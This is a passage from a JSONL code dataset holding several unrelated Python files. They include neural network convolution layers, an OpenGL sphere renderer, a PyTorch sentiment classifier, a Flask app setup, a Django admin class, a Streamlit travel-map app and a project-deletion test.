entity.HasRegion,\n entity.HasTemplate,\n entity.HasItems):\n\n def __init__(self, *args, **kwargs):\n super(Document, self).__init__(*args, **kwargs)\n self._logic_modules = {}\n\n logged_in = False\n account_id = ObjectIdField(db_field='accountId')\n commands = ListField(StringField())\n\n meta: {\n 'collection': 'character'\n }\n\n def add_command(self, cmd_name: str):\n if cmd_name not in self.commands:\n self.commands.append(cmd_name)\n\n def has_command(self, cmd_name: str):\n return cmd_name in self.commands\n\n def find_command(self, cmd_name: str):\n for command in self.commands:\n if command == cmd_name:\n return command\n\n for command in self.commands:\n if command.startswith(cmd_name):\n return command\n return None\n\n def from_template(self, template: CharacterTemplate):\n if template:\n self.name = template.name\n self.description = template.description\n self.logic = template.logic\n self.data = template.data\n self.template_id = template.id\n self.item_ids = template.item_ids\n","sub_path":"src/entities/character.py","file_name":"character.py","file_ext":"py","file_size_in_byte":1525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"428901575","text":"# -*- coding: utf8 -*-\nimport os\nimport os.path\nimport sys\nimport flask\nimport flask_assets\nfrom zeeguu_web.crosscutting_concerns import CrossDomainApp\nimport tempfile\n\nif sys.version_info[0] < 3:\n raise Exception(\"Must be using Python 3\")\n\n# *** Starting the App *** #\napp = CrossDomainApp(__name__)\n\nconfig_file = os.environ['ZEEGUU_WEB_CONFIG']\napp.config.from_pyfile(config_file, silent=False)\nconfiguration = app.config\n\nassert \"ZEEGUU_API\" in app.config\n\nprint(\" == Web running with API: \" + app.config['ZEEGUU_API'])\n# the umr blueprint needs to have the ZEEGUU_API in the os.environ['ZEEGUU_API']\nos.environ['ZEEGUU_API'] = app.config['ZEEGUU_API']\n\nfrom .account import account\nfrom .bookmarks import bookmarks_blueprint\nfrom .static_pages import static_pages\n\napp.instance_path = tempfile.gettempdir() + \"/zeeguu-web-instance-path\"\napp.register_blueprint(account)\napp.register_blueprint(bookmarks_blueprint)\napp.register_blueprint(static_pages)\n\nfrom zeeguu_exercises import ex_blueprint\n\napp.register_blueprint(ex_blueprint, url_prefix=\"/practice\")\n\nfrom umr import reader_blueprint\n\napp.register_blueprint(reader_blueprint, url_prefix=\"/read\")\n\nenv = flask_assets.Environment(app)\nenv.cache = app.instance_path\nenv.directory = os.path.join(app.instance_path, \"gen\")\nenv.url = \"/gen\"\nenv.append_path(os.path.join(\n os.path.dirname(os.path.abspath(__file__)), \"static\"\n), \"/static\")\n\n\n# create the instance folder and return the path\ndef instance_path(app):\n path = os.path.join(app.instance_path, \"gen\")\n try:\n os.makedirs(path)\n except Exception as e:\n print((\"exception\" + str(e)))\n if not os.path.isdir(path):\n raise\n return path\n\n\ninstance = flask.Blueprint(\"instance\", __name__, static_folder=instance_path(app))\napp.register_blueprint(instance)\n","sub_path":"zeeguu_web/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"500157317","text":"from __future__ import division, absolute_import\n\nfrom abc import abstractmethod\n\nimport numpy as np\n\nfrom odin import backend as K\nfrom odin.basic import PARAMETER, WEIGHT, BIAS\nfrom odin.utils.decorators import autoinit\nfrom odin.utils import as_tuple\nfrom odin.utils.shape_calculation import get_conv_output_shape\nfrom .base import NNOps, NNConfig\n\n\nclass Conv(NNOps):\n \"\"\" Convolutional Operator\n\n Performs a 2D or 3D convolution on its input and optionally adds a bias and\n applies an elementwise activation.\n\n Parameters\n ----------\n num_filters : int\n The number of learnable convolutional filters this layer has.\n\n filter_size : int or iterable of int\n tuple specifying the size of the filters.\n\n stride : int or iterable of int\n specifying the stride of the convolution operation.\n\n pad : int, iterable of int, 'full', 'same' or 'valid' (default: 'valid')\n By default, the convolution is only computed where the input and the\n filter fully overlap (a valid convolution). When ``stride=1``, this\n yields an output that is smaller than the input by ``filter_size - 1``.\n The `pad` argument allows you to implicitly pad the input with zeros,\n extending the output size.\n\n A single integer results in symmetric zero-padding of the given size on\n all borders, a tuple of two integers allows different symmetric padding\n per dimension.\n\n ``'full'`` pads with one less than the filter size on both sides. This\n is equivalent to computing the convolution wherever the input and the\n filter overlap by at least one position.\n\n ``'same'`` pads with half the filter size (rounded down) on both sides.\n When ``stride=1`` this results in an output size equal to the input\n size. Even filter size is not supported.\n\n ``'valid'`` is an alias for ``0`` (no padding / a valid convolution).\n\n Note that ``'full'`` and ``'same'`` can be faster than equivalent\n integer values due to optimizations by theano or tensorflow.\n\n untie_biases : bool (default: False)\n If ``False``, the layer will have a bias parameter for each channel,\n which is shared across all positions in this channel. As a result, the\n `b` attribute will be a vector (1D).\n\n If True, the layer will have separate bias parameters for each\n position in each channel. As a result, the `b` attribute will be a\n 3D tensor.\n\n W_init : Theano shared variable, expression, numpy array or callable\n Initial value, expression or initializer for the weights.\n These should be a 4D tensor with shape\n ``(num_filters, num_input_channels, filter_rows, filter_columns)``.\n See :func:`lasagne.utils.create_param` for more information.\n\n b_init : Theano shared variable, expression, numpy array, callable or ``None``\n Initial value, expression or initializer for the biases. If set to\n ``None``, the layer will have no biases. Otherwise, biases should be\n a 1D array with shape ``(num_filters,)`` if `untie_biases` is set to\n ``False``. If it is set to ``True``, its shape should be\n ``(num_filters, output_rows, output_columns)`` instead.\n See :func:`lasagne.utils.create_param` for more information.\n\n activation : callable or None\n The activation that is applied to the layer activations. If None\n is provided, the layer will be linear.\n\n dilation : int or iterable of int\n Specifying the dilation factor of the filters. A factor of\n :math:`x` corresponds to :math:`x - 1` zeros inserted between\n adjacent filter elements.\n\n **kwargs\n Any additional keyword arguments are passed to the `NNOps` superclass.\n\n Attributes\n ----------\n W : Theano shared variable or expression\n Variable or expression representing the filter weights.\n\n b : Theano shared variable or expression\n Variable or expression representing the biases.\n\n Note\n ----\n This Ops can be used for both 2D and 3D images (videos)\n \"\"\"\n\n @autoinit\n def __init__(self, num_filters, filter_size, strides=1, pad='valid',\n W_init=K.init.glorot_uniform,\n b_init=K.init.constant(0),\n untie_biases=False,\n activation=K.linear,\n dilation=1, **kwargs):\n super(Conv, self).__init__(**kwargs)\n self.activation = K.linear if activation is None else activation\n\n # ==================== abstract methods ==================== #\n def _transpose(self):\n # flip the input and hidden\n return TransposeConv(self)\n\n def _initialize(self, x):\n input_shape = K.get_shape(x)\n # ====== validate init arguments ====== #\n ndim = len(input_shape) - 2; self.ndim = ndim\n # padding\n if isinstance(self.pad, (tuple, list, int)):\n self.pad = as_tuple(self.pad, ndim, int)\n elif self.pad is None:\n self.pad = (0,) * ndim\n # strides\n if self.strides is None:\n self.strides = (0,) * ndim\n else:\n self.strides = as_tuple(self.strides, ndim, int)\n # dilation\n if self.dilation is None:\n self.dilation = (1,) * ndim\n else:\n self.dilation = as_tuple(self.dilation, ndim, int)\n # filter size\n self.filter_size = as_tuple(self.filter_size, ndim, int)\n # ====== create config ====== #\n config = NNConfig(input_shape=input_shape)\n # TF kernel shape: (kernel_dim1, kernel_dim2, ..., input_depth, out_depth)\n kernel_shape = self.filter_size + (input_shape[-1], self.num_filters)\n # weights\n config.create_params(self.W_init, shape=kernel_shape, name='W',\n nnops=self, roles=WEIGHT)\n if self.b_init is not None:\n if self.untie_biases:\n output_shape = get_conv_output_shape(input_shape, kernel_shape,\n border_mode=self.pad, subsample=self.strides,\n filter_dilation=self.dilation)\n biases_shape = output_shape[1:]\n else:\n biases_shape = (self.num_filters,)\n config.create_params(self.b_init, shape=biases_shape, name='b',\n nnops=self, roles=BIAS)\n return config\n\n def _apply(self, x):\n # store last input for deconvolution ops\n self._last_input = x\n conved = self.convolve(x)\n output_shape = K.get_shape(conved)\n if not hasattr(self, 'b'):\n conved = conved\n elif self.untie_biases:\n conved += K.expand_dims(self.b, 0)\n else:\n conved += K.dimshuffle(self.b, ('x',) * (self.ndim + 1) + (0,))\n activated = self.activation(conved)\n K.add_shape(activated, output_shape)\n # set shape for output\n return activated\n\n def convolve(self, x):\n if self.ndim == 2:\n conv_func = K.conv2d\n elif self.ndim == 3:\n conv_func = K.conv3d\n else:\n raise Exception('No support for %d-D input.' % self.ndim)\n conved = conv_func(x, kernel=self.W,\n strides=self.strides,\n border_mode=self.pad,\n filter_dilation=self.dilation)\n return conved\n\n\nclass TransposeConv(NNOps):\n\n def __init__(self, conv):\n if not isinstance(conv, Conv):\n raise ValueError('TransposeConv Ops only accepts BaseConv as arguments.')\n super(TransposeConv, self).__init__(name=conv.name + '_transpose')\n self.conv = conv\n\n # ==================== abstract method ==================== #\n def _initialize(self, x):\n \"\"\" This function return NNConfig for given configuration from arg\n and kwargs\n \"\"\"\n # check if original Ops is initialized\n if self.conv.configuration is None:\n raise Exception('Convolution ops:\"%s\" have not initialized.' % str(self.conv))\n output_shape = self.conv.input_shape\n config = NNConfig(output_shape=output_shape)\n # initialize parameters\n b_init = self.conv.b_init\n if b_init is not None:\n if self.conv.untie_biases:\n biases_shape = output_shape[1:]\n else:\n biases_shape = (output_shape[-1],)\n config.create_params(b_init, shape=biases_shape, name='b',\n nnops=self, roles=BIAS)\n return config\n\n def _apply(self, x):\n if K.ndim(x) != self.conv.ndim + 2:\n raise ValueError('Input has %d dimensions, but this Ops require %d-D '\n 'tensor.' % (K.ndim(x), self.conv.ndim + 2))\n # ====== prepare the deconvolution ====== #\n stride = self.conv.strides\n border_mode = self.conv.pad\n W = self.conv.W\n dilation = self.conv.dilation\n # if Dilated Convolution, must transpose the Weights\n if self.conv.ndim == 2:\n deconv_func = K.deconv2d\n elif self.conv.ndim == 3:\n deconv_func = K.deconv3d\n else:\n raise Exception('No support for %d-D input in TransposedConv' %\n self.conv.ndim)\n # theano require batch_dims is Constant or None, but tensorflow\n # require batch_dims is a native TensorVariable\n conved = deconv_func(x, kernel=W,\n output_shape=K.get_shape(self.conv._last_input,\n native=True if K.backend() == 'tensorflow' else False),\n strides=stride,\n border_mode=border_mode,\n filter_dilation=dilation)\n if hasattr(self, 'b'):\n if self.conv.untie_biases:\n conved += K.expand_dims(self.b, 0)\n else:\n conved += K.dimshuffle(self.b, ('x',) * (self.conv.ndim + 1) + (0,))\n activated = self.conv.activation(conved)\n K.add_shape(activated, self.conv.input_shape)\n return activated\n\n def _transpose(self):\n return self.conv\n","sub_path":"odin/nnet/conv.py","file_name":"conv.py","file_ext":"py","file_size_in_byte":10246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"481338415","text":"from OpenGL.GLUT import *\nfrom OpenGL.GLU import *\nfrom OpenGL.GL import *\nfrom math import *\n\nclass Sphere:\n\n\thalf_pi = pi/2\n\n\tdef __init__(self, x, y, z, radius,color = (0,0,0), density = 50, tx = None):\n\t\tself.position = (x, y, z)\n\t\tself.radius = radius\n\t\tself.color = color\n\t\tself.density = density\n\t\tself.tx = tx\n\n\tdef draw(self, rotation = (0,1,1,1), texture_index = None):\n\t\tif texture_index is not None:\n\t\t\tself._draw_texturized_sphere(rotation, texture_index)\t\n\t\telse:\n\t\t\tself._draw_filled_sphere(rotation)\t\t\n\n\n\tdef move(self, x, y, z):\n\t\tself.position = (self.position[0] + x, self.position[1] + y, self.position[2] + z)\n\n\n\tdef move_to (self, x, y, z):\n\t\tself.position = (x, y, z)\n\n\n\tdef _sphere(self, u, v):\n\t\ttheta = (u * pi / (self.density - 1)) - self.half_pi\n\t\tphi = (v * 2 * pi) / (self.density - 1)\n\n\t\tx = self.radius * cos(theta) * cos(phi)\n\t\ty = self.radius * sin(theta)\n\t\tz = self.radius * cos(theta) * sin(phi)\n\n\t\treturn x, y, z\n\n\n\tdef _draw_filled_sphere(self, rotation):\n\t\tglPushMatrix()\n\t\t\n\t\tglTranslatef(*self.position)\n\t\tglRotatef(*rotation)\n\n\t\tfor i in range(0, self.density):\n\t\t\tglBegin(GL_TRIANGLE_STRIP)\n\t\t\tfor j in range(0, self.density):\n\t\t\t\tself._setColor(i, j)\n\t\t\t\tglVertex3fv(self._sphere(i,j))\n\t\t\t\tglVertex3fv(self._sphere(i - 1,j))\n\t\t\tglEnd()\n\n\t\tglPopMatrix()\n\n\n\tdef _setColor(self, i, j): \n\t\tif i < self.density//2: \n\t\t\tr = (i) / (self.density /2 - 1)\n\t\t\tg = (i) / (self.density /2 - 1)\n\t\t\tb = (i) / (self.density /2 - 1)\n\t\telse:\n\t\t\tr = ((self.density - i) / (self.density /2 - 1)) - 0.08\n\t\t\tg = ((self.density - i) / (self.density /2 - 1)) - 0.08\n\t\t\tb = ((self.density - i) / (self.density /2 - 1)) - 0.08\n\t\t\n\t\tglColor3f(r + (self.color[0] / 255), g + (self.color[1] / 255), b + (self.color[2] / 255))\n\n\n\tdef _draw_texturized_sphere(self, rotation, index):\n\n\t\tglBindTexture(GL_TEXTURE_2D, self.tx.textures[index])\n\n\t\tglPushMatrix()\n\t\t\n\t\tglTranslatef(*self.position)\n\t\tglRotatef(*rotation)\n\n\t\tfor i in range(0, self.density):\n\t\t\tglBegin(GL_TRIANGLE_STRIP)\n\t\t\tfor j in range(0, self.density):\n\t\t\t\tglTexCoord2f((self.density - 1 - j)/(self.density - 1), (self.density - 1 - i)/(self.density - 1)); glVertex3fv(self._sphere(i,j))\n\t\t\t\tglTexCoord2f((self.density - 1 - j)/(self.density - 1), (self.density - 1 - i)/(self.density - 1)); glVertex3fv(self._sphere(i - 1,j))\n\t\t\tglEnd()\n\n\t\tglPopMatrix()\t\n\n\n\tdef get_orbit_position(self, sphere, distance, angle):\t\n\n\t\tx, y, z = sphere.position\n\n\t\tx2 = x + ((sphere.radius + distance) * cos(angle))\n\t\ty2 = y + ((sphere.radius + distance) * sin(angle))\n\t\tz2 = z \n\n\t\treturn x2, y2, z2\n\n\nangle = {}\nrotation_speed = {}\ntranslation_speed = {}\n\ndef set_angle(index, rotation = (0,0), translation = (0,0)):\n\t\tangle[index] = {\n\t\t\t'rotation': rotation[0],\n\t\t\t'translation': translation[0]\n\t\t}\n\t\trotation_speed[index] = rotation[1]\n\t\ttranslation_speed[index] = translation[1]\n\n\ndef rotate(name):\n\tglobal angle\n\tangle[name]['rotation'] += rotation_speed[name]\n\tangle[name]['translation'] += translation_speed[name]","sub_path":"OpenGL/Textura/Planeta/Sphere.py","file_name":"Sphere.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"212317725","text":"import os\nimport logging\n\nimport docker\nimport selenium\n\nimport testutils\n\n\ndef test_delete_project(driver: selenium.webdriver, *args, **kwargs):\n \"\"\"\n Test that deleting a project in Gigantum deletes its file path and Docker image.\n\n Args:\n driver\n \"\"\"\n r = testutils.prep_py3_minimal_base(driver)\n username, project_name = r.username, r.project_name\n\n logging.info(f\"Checking that project {project_name} file path exists\")\n project_path = os.path.join(os.environ['GIGANTUM_HOME'], 'servers', testutils.current_server_id(),\n username, username, 'labbooks', project_name)\n\n assert os.path.exists(project_path), \\\n f\"Project {project_name} should exist at file path {project_path}\"\n\n logging.info(f\"Checking that project {project_name} Docker image exists\")\n dc = docker.from_env()\n project_img = []\n for img in dc.images.list():\n for t in img.tags:\n if 'gmlb-' in t and project_name in t:\n logging.info(f\"Found project {project_name} Docker image tag {t}\")\n project_img.append(img)\n\n assert len(project_img) == 1, f\"Expected project {project_name} to have one Docker image tag\"\n\n logging.info(f\"Deleting project {project_name}\")\n delete_project_elts = testutils.DeleteProjectElements(driver)\n delete_project_elts.delete_local_project(project_name)\n\n logging.info(f\"Checking that project {project_name } file path and Docker image no longer exist\")\n\n assert not os.path.exists(project_path), f\"Deleted project {project_name} exists at {project_path}\"\n\n project_img = []\n for img in dc.images.list():\n for t in img.tags:\n if \"gmlb-\" in t and project_name in t:\n logging.error(f\"Deleted project {project_name} has Docker image tag {t}\")\n project_img.append(img)\n\n assert len(project_img) == 0, \\\n f\"Deleted project {project_name} has Docker image {project_img[0]}\"\n","sub_path":"testing-legacy/gigantum_tests/test_delete_project.py","file_name":"test_delete_project.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"188111152","text":"import sentiment_utils as sent\r\nfrom sentiment_utils import MovieReviews\r\nfrom torch.utils.data import DataLoader\r\nimport torch\r\nfrom torchtext.data import get_tokenizer\r\nimport time\r\nfrom torchtext.vocab import build_vocab_from_iterator\r\nfrom torch.utils.data.dataset import random_split\r\nimport datetime\r\nimport os\r\nimport time \r\nimport pandas as pd\r\n\r\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\nprint(f\"Using {device} device for Torch\")\r\n\r\n\r\nmovie_train = MovieReviews(\"./movie_reviews/\", train=True, transform=None)\r\n# movie_test = MovieReviews(\"./movie_reviews/\", train=False, transform=None)\r\n\r\nsentiment_map = {\r\n 0: \"negative\",\r\n 1: \"somewhat negative\",\r\n 2: \"neutral\",\r\n 3: \"somewhat positive\",\r\n 4: \"positive\"\r\n}\r\n\r\ndef yield_tokens(data_iter):\r\n for text, _ in data_iter:\r\n yield tokenizer(text)\r\n\r\ntokenizer = get_tokenizer('basic_english')\r\nprint(\"Building Tokenized Vocab\")\r\nvocab = build_vocab_from_iterator(yield_tokens(movie_train))\r\n\r\ntext_pipeline = lambda x: vocab.lookup_indices(tokenizer(x))\r\nlabel_pipeline = lambda x: int(x)\r\n\r\n\r\ndef collate_batch(batch):\r\n label_list, text_list, offsets = [], [], [0]\r\n for (_text, _label) in batch:\r\n label_list.append(label_pipeline(_label))\r\n processed_text = torch.tensor(text_pipeline(_text), dtype=torch.int64).to(device)\r\n text_list.append(processed_text)\r\n offsets.append(processed_text.size(0))\r\n label_list = torch.tensor(label_list, dtype=torch.int64).to(device)\r\n offsets = torch.tensor(offsets[:-1]).cumsum(dim=0).to(device)\r\n text_list = torch.cat(text_list).to(device)\r\n return label_list.to(device), text_list.to(device), offsets.to(device)\r\n\r\n\r\nnum_classes = len(sentiment_map.keys())\r\nvocab_size = len(vocab)\r\nembed_size = 64\r\nmodel = sent.TextClassificationModel(vocab_size, embed_size, num_classes).to(device)\r\n#model = sent.TextLSTM(vocab_size, embed_size, num_classes, 3).to(device)\r\n\r\n\r\ndef train(dataloader):\r\n model.train()\r\n total_acc, total_count = 0, 0\r\n log_interval = 500\r\n start_time = time.time()\r\n for idx, (label, text, offsets) in enumerate(dataloader):\r\n optimizer.zero_grad()\r\n predited_label = model(text, offsets)\r\n loss = criterion(predited_label, label)\r\n loss.backward()\r\n torch.nn.utils.clip_grad_norm_(model.parameters(), 0.1)\r\n optimizer.step()\r\n total_acc += (predited_label.argmax(1) == label).sum().item()\r\n total_count += label.size(0)\r\n if idx % log_interval == 0 and idx > 0:\r\n elapsed = time.time() - start_time\r\n print('| epoch {:3d} | {:5d}/{:5d} batches '\r\n '| accuracy {:8.3f}'.format(epoch, idx, len(dataloader),\r\n total_acc/total_count))\r\n total_acc, total_count = 0, 0\r\n start_time = time.time()\r\n\r\ndef evaluate(dataloader):\r\n model.eval()\r\n total_acc, total_count = 0, 0\r\n\r\n with torch.no_grad():\r\n for idx, (label, text, offsets) in enumerate(dataloader):\r\n predited_label = model(text, offsets)\r\n loss = criterion(predited_label, label)\r\n total_acc += (predited_label.argmax(1) == label).sum().item()\r\n total_count += label.size(0)\r\n return total_acc/total_count\r\n\r\n\r\n# Hyperparameters\r\nEPOCHS = 25 # epoch\r\nLR = 1.0 # learning rate\r\nBATCH_SIZE = 64 # batch size for training\r\n\r\nnum_train = int(len(movie_train) * 0.95)\r\nsplit_train_, split_valid_ = \\\r\n random_split(movie_train, [num_train, len(movie_train) - num_train])\r\n\r\ntrain_dataloader = DataLoader(split_train_, batch_size=BATCH_SIZE,\r\n shuffle=True, collate_fn=collate_batch)\r\nvalid_dataloader = DataLoader(split_valid_, batch_size=BATCH_SIZE,\r\n shuffle=True, collate_fn=collate_batch)\r\n\r\n\r\ntrain_dataloader = sent.DeviceDataLoader(train_dataloader, device=device)\r\nvalid_dataloader = sent.DeviceDataLoader(valid_dataloader, device=device)\r\n\r\n\r\ncriterion = torch.nn.CrossEntropyLoss().to(device)\r\noptimizer = torch.optim.SGD(model.parameters(), lr=LR)\r\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1.0, gamma=0.1)\r\ntotal_accu = None\r\n\r\n\r\nprint(\"Begin Training\\n\", \"*\"*75)\r\ntotal_start_time = time.time()\r\nfor epoch in range(1, EPOCHS + 1):\r\n epoch_start_time = time.time()\r\n train(train_dataloader)\r\n accu_val = evaluate(valid_dataloader)\r\n if total_accu is not None and total_accu > accu_val:\r\n scheduler.step()\r\n else:\r\n total_accu = accu_val\r\n print('-' * 59)\r\n print('| end of epoch {:3d} | time: {:5.2f}s | '\r\n 'valid accuracy {:8.3f} '.format(epoch,\r\n time.time() - epoch_start_time,\r\n accu_val))\r\n print('-' * 59)\r\nprint(f\"Total Training Time: {(time.time() - total_start_time) / 60:5.2f}mins\")\r\n\r\nprint(\"Saving the model\")\r\nnow = datetime.datetime.now()\r\nmodel_name = \"\".join([\"simple_sent_\", str(now.year), str(now.month), \r\n str(now.day), str(now.hour), str(now.minute), str(now.second)])\r\n\r\nif not os.path.isdir('./models'):\r\n os.mkdir('./models')\r\ntorch.save(model, \"./models/\" + model_name + \".pt\")\r\n\r\n\r\ndef predict(text, text_pipeline):\r\n with torch.no_grad():\r\n text = torch.tensor(text_pipeline(text)).long()\r\n output = model(text, torch.tensor([0]).long())\r\n return output.argmax(1).item()\r\n\r\nmodel.to(\"cpu\")\r\n\r\nprint(\"Classifying Training Data..\")\r\ntrue_labels = []\r\npred_labels = []\r\nfor text, label in movie_train:\r\n true_labels.append(label)\r\n prediction = predict(text, text_pipeline)\r\n pred_labels.append(prediction)\r\n\r\nprint(\"Writing Prediction .csv..\")\r\npred_df = pd.DataFrame(zip(true_labels, pred_labels), columns=[\"Trues\", \"Prediction\"])\r\npred_df.to_csv(\"./results/\" + model_name + \"_predictions_trues.csv\")","sub_path":"simple_sentiment_classification.py","file_name":"simple_sentiment_classification.py","file_ext":"py","file_size_in_byte":5911,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"505721610","text":"from django.contrib import admin\nfrom django.utils.html import format_html\n\nfrom label.form import LabelForm\nfrom label.models import Label\n\n\n# Register your models here.\n\n@admin.register(Label)\nclass LabelAdmin(admin.ModelAdmin):\n form = LabelForm\n fieldsets = (\n (None, {\n 'fields': ('project', 'name', 'color')\n }),\n )\n\n def label(self, obj):\n def complementaryColor(my_hex):\n if my_hex[0] == '#':\n my_hex = my_hex[1:]\n try:\n\n rgb = tuple(int(my_hex[i:i + 2], 16) for i in (0, 2, 4))\n if (rgb[0] * 0.299 + rgb[1] * 0.587 + rgb[2] * 0.114) > 127:\n return '#000000'\n return '#ffffff'\n except:\n return \"#000000\"\n\n return format_html(\n '{}',\n obj.color,\n complementaryColor(obj.color),\n obj.name)\n\n list_display = ('label',)\n","sub_path":"backend/label/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"413446233","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nfrom streamlit_folium import folium_static\nimport city_page\nimport country_page\nimport re\n\nimport folium as f\nfrom streamlit_folium import folium_static\n\nimport map as M\nimport queries as Q\n\n# define pages\nPAGES = {\n 'countryDetail': country_page,\n 'cityDetail': city_page\n}\n\n\n############################### FUNCTIONS ######################################\ndef _max_width_(): # CSS to make screen in wide mode\n max_width_str = f\"max-width: 1200px;\"\n st.markdown(\n f\"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef background(): # CSS to change background\n max_width_str = f\"max-width: 2000px;\"\n st.markdown(\n \"\"\"\n \n \"\"\",\n unsafe_allow_html=True,\n )\n\n\ndef find_index(search_item, list):\n i = 0\n while i < len(list):\n if search_item == list[i]:\n return i\n i += 1\n return \"Not found\"\n\n\ndef options():\n return_list = {} # dictionary\n options.filter_by_capital = False\n options.custom_coordinates = False\n continent = 'all'\n region = 'all'\n country = 'all'\n\n if st.checkbox(\"Enable custom coordinates\"):\n options.custom_coordinates = True\n user_input = [(st.number_input(\"Latitude\"), st.number_input(\"Longtitude\"))]\n options.user_coordinates = user_input\n\n if st.checkbox(\"Filter by Continent\"):\n continents = {'continent': [], 'label': []}\n result_list = Q.get_continents()\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please try another option!\"\n \"\", unsafe_allow_html=True)\n else:\n for cont in result_list:\n continents['continent'].append(cont[0])\n continents['label'].append(cont[1])\n option_continent = st.selectbox(\n 'Which continents?',\n sorted(continents['label']))\n\n if option_continent:\n return_list['continent'] = option_continent\n index = find_index(option_continent, continents['label'])\n continent = continents['continent'][index]\n else:\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please select a continent or unselect the checkbox!\"\n \"\", unsafe_allow_html=True)\n\n if st.checkbox(\"Filter by Region\"):\n regions = {'region': [], 'label': []}\n result_list = Q.get_regions(continent)\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please try another option!\"\n \"\", unsafe_allow_html=True)\n else:\n for reg in result_list:\n regions['region'].append(reg[0])\n regions['label'].append(reg[1])\n option_region = st.selectbox(\n 'Which Region?',\n sorted(regions['label']))\n\n if option_region:\n return_list['region'] = option_region\n index = find_index(option_region, regions['label'])\n region = regions['region'][index]\n else:\n st.markdown(\"\"\n \"No results found, please select a region or unselect the checkbox!\"\n \"\", unsafe_allow_html=True)\n\n countries = {'country': [], 'label': []}\n for count in Q.get_countries(continent, region):\n countries['country'].append(count[0])\n countries['label'].append(count[1])\n option_country = st.selectbox(\n 'Which country?',\n sorted(countries['label']))\n\n if option_country: ## if there is an option, then we save it in the list\n return_list[\"country\"] = option_country\n index = find_index(option_country, countries['label'])\n country = countries['country'][index]\n options.country = country\n options.countrylabel = option_country\n else:\n st.markdown(\"\"\n \"No results found...\"\n \"\", unsafe_allow_html=True)\n\n if st.checkbox(\"Select City\"):\n options.filter_by_capital = True\n capitals = {'capital': [], 'label': []}\n result_list = Q.get_capitals(country)\n if result_list == []:\n st.markdown(\"\"\n \"No results found, please try another option!\"\n \"\", unsafe_allow_html=True)\n else:\n for cap in result_list:\n capitals['capital'].append(cap[0])\n capitals['label'].append(cap[1])\n option_capital = st.selectbox(\n 'Which City?',\n sorted(capitals['label']))\n\n if option_capital:\n return_list[\"capital\"] = option_capital\n index = find_index(option_capital, capitals['label'])\n capital = capitals['capital'][index]\n options.capital = capital\n options.capitallabel = option_capital\n else:\n st.markdown(\"\"\n \"No results found, please select a capital or unselect the checkbox!\"\n \"\", unsafe_allow_html=True)\n\n return return_list\n\n\ndef getMap(coordinates): ### touples array! [(float, float), (float, float)]\n if not coordinates: ## if no coordinates, show general map\n return folium_static(f.Map())\n\n mapIt = f.Map()\n for coord in coordinates:\n mapIt = f.Map(location=[coord[0], coord[1]], zoom_start=4)\n f.Marker([coord[0], coord[1]]).add_to(mapIt)\n\n return folium_static(mapIt)\n\n\n############################### INTRODUCTION ####################################\n_max_width_()\nbackground()\nst.title(\"WELCOME TO TOURISTIQ\")\nif Q.endpoint is None:\n st.markdown(\"\"\n \"No endpoint inserted, check the readme file for instructions!\"\n \"\", unsafe_allow_html=True)\n\"\"\"\nLove to travel? Explore your options and find you next destination!\nOr are you already on your journey? Then learn more about the place you’re at and the place you’re going to next!\nJust click the country or city you want to find out more about, you can filter by continent and/or region.\n\"\"\"\ncol1, col2 = st.beta_columns([2, 3])\n\nwith col1:\n st.subheader(\"Please select the country or city that you want to view\")\n \"\"\"\n \"\"\"\n results_from_funoptions = options()\n for key, value in results_from_funoptions.items():\n \"You selected \" + key + \": \" + value\n\nwith col2:\n if not options.custom_coordinates: # Experimental feature to insert custom coordinates to test certain spots on the map.\n if not options.filter_by_capital: # Filters by country if capital filtering is not specified.\n try:\n cords = str(Q.get_country_coordinates(options.country)[0])\n cords = re.split('\\(|\\)| ', cords)\n M.getMap([(cords[2], cords[1])], 4)\n except:\n st.markdown(\"\"\n \"Oops! It appears that our external databases do not yet contain the coordinates of this country.\"\n \"This doesn't mean your option is invalid, please continue.\"\n \"\", unsafe_allow_html=True)\n else: # Filter by capital\n try:\n cords = Q.get_capital_coordinates(options.capital)\n M.getMap(cords, 12)\n except:\n st.markdown(\"\"\n \"Oops! It appears that our external databases do not yet contain the coordinates of this country.\"\n \"This doesn't mean your option is invalid, please continue.\"\n \"\", unsafe_allow_html=True)\n else: # Check inserted coordinates on the map.\n M.getMap(options.user_coordinates, 4)\n\n# I have decided to place the col2 in the button function, the map will now appear as the user gives input.\n\nif st.button('Find Places'):\n if hasattr(options, 'capital'):\n PAGES['cityDetail'].show(city=options.capital, cityName=options.capitallabel)\n else:\n PAGES['countryDetail'].show(country=options.country, countrylabel=options.countrylabel)","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":9687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"459230324","text":"def main():\n parser = argparse.ArgumentParser(description='Chainer example: MNIST')\n parser.add_argument('--batchsize', '-b', type=int, default=400, help='Number of images in each mini-batch')\n parser.add_argument('--epoch', '-e', type=int, default=20, help='Number of sweeps over the dataset to train')\n parser.add_argument('--gpu0', '-g', type=int, default=0, help='First GPU ID')\n parser.add_argument('--gpu1', '-G', type=int, default=1, help='Second GPU ID')\n parser.add_argument('--out', '-o', default='result_parallel', help='Directory to output the result')\n parser.add_argument('--resume', '-r', default='', help='Resume the training from snapshot')\n parser.add_argument('--unit', '-u', type=int, default=1000, help='Number of units')\n args = parser.parse_args()\n print('GPU: {}, 